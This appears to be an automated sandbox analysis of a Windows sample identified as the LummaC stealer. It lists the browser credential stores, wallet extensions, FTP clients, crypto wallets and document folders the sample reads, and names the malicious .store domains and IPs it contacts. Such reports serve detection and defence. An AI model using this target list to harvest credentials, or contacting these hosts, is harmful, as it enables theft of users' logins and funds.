Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PWCCAWLGRE Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\ZGGKNSUKOP Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EEGWXUHVUG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\TQDFJHPUIU Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\QCFWYSKMHA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\DUUDTUBZFW Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000003.1566660244.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 4936, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 4936, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.95.91
 crisiwarny.store United States
13335 CLOUDFLARENETUS true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false

Contacted Domains

Name IP Active
crisiwarny.store 104.21.95.91 true
presticitpo.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
presticitpo.store true
    		unknown
    scriptyprefej.store true
      		unknown
      https://crisiwarny.store/api true
        		unknown
        necklacedmny.store true
          		unknown
          fadehairucw.store true
            		unknown
            navygenerayk.store true
              		unknown
              founpiuer.store true
                		unknown
                thumbystriw.store true
                  		unknown
                  crisiwarny.store true
                    		unknown